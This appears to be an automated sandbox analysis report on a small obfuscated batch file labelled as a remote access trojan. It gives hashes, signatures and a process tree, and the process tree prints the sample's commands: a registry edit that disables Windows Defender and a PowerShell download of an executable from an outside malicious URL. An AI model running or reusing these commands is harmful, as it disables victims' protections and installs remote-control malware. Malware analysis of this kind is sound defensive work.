Analysis

  • max time kernel
    16s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24-12-2024 17:24

General

  • Target

    FUD RAT___Obfuscated.bat

  • Size

    463B

  • MD5

    a9fdda2577ff67660be21d0d4cd98179

  • SHA1

    15432871fed4cbb19ec26eaabcc6b193beebbbfb

  • SHA256

    8f18705cf5653667888ea5f2440e984d22c5207e7e5e2fccb68e7ad71f58bb83

  • SHA512

    0f43e8b47bdd9d1a2ce65db49868f7698b83bcb5f8d249a29078793e5ca48d75bf8ce99dae00f772c28b766ac761040c0113d9034e7e7d35efb75b39eca5153d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://whatsabool.online/kingvonpiracyvirus/load.exe

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\FUD RAT___Obfuscated.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
        PID:2828
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://whatsabool.online/kingvonpiracyvirus/load.exe', 'C:\Users\Admin\AppData\Local\Temp\load.exe')"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2832

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2832-4-0x000007FEF64EE000-0x000007FEF64EF000-memory.dmp

      Filesize

      4KB

    • memory/2832-6-0x0000000002240000-0x0000000002248000-memory.dmp

      Filesize

      32KB

    • memory/2832-8-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

      Filesize

      9.6MB

    • memory/2832-7-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

      Filesize

      9.6MB

    • memory/2832-5-0x000000001B660000-0x000000001B942000-memory.dmp

      Filesize

      2.9MB

    • memory/2832-9-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

      Filesize

      9.6MB

    • memory/2832-10-0x000007FEF6230000-0x000007FEF6BCD000-memory.dmp

      Filesize

      9.6MB